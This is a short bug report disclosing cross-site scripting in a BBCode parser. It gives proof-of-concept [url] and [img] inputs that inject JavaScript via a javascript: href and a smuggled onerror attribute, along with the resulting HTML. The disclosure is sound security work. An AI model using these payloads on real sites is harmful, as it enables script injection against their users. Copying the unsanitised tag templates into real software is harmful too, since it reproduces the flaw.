XSS possible via img and url tags


Using the demo code for the project shown on the https://bbcode.codeplex.com/ home page, it is possible to inject JavaScript into the page to be executed:

The parser is set up as:
 var parser = new BBCodeParser(new[]
                    new BBTag("b", "<b>", "</b>"), 
                    new BBTag("i", "<span style=\"font-style:italic;\">", "</span>"), 
                    new BBTag("u", "<span style=\"text-decoration:underline;\">", "</span>"), 
                    new BBTag("code", "<pre class=\"prettyprint\">", "</pre>"), 
                    new BBTag("img", "<img src=\"${content}\" />", "", false, true), 
                    new BBTag("quote", "<blockquote>", "</blockquote>"), 
                    new BBTag("list", "<ul>", "</ul>"), 
                    new BBTag("*", "<li>", "</li>", true, false), 
                    new BBTag("url", "<a href=\"${href}\">", "</a>", new BBAttribute("href", ""), new BBAttribute("href", "href")), 
The first test is a [url] as follows:
parser.ToHtml("[url href=javascript:document.body.innerHTML=String.fromCharCode(88,83,83)]bbcode[/url]")
Which results in the following HTML:
<a href="javascript:document.body.innerHTML=String.fromCharCode(88,83,83)">bbcodetest</a>
Clicking on this link will cause 'XSS' to be rendered to the page.

The second test is a [img] as follow:
parser.ToHtml("[img] [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]")
Which results in the following HTML:
<img src=" <img src=" onerror=javascript:alert(String.fromCharCode(88,83,83)) "/> " />
Which causes JavaScript to be executed.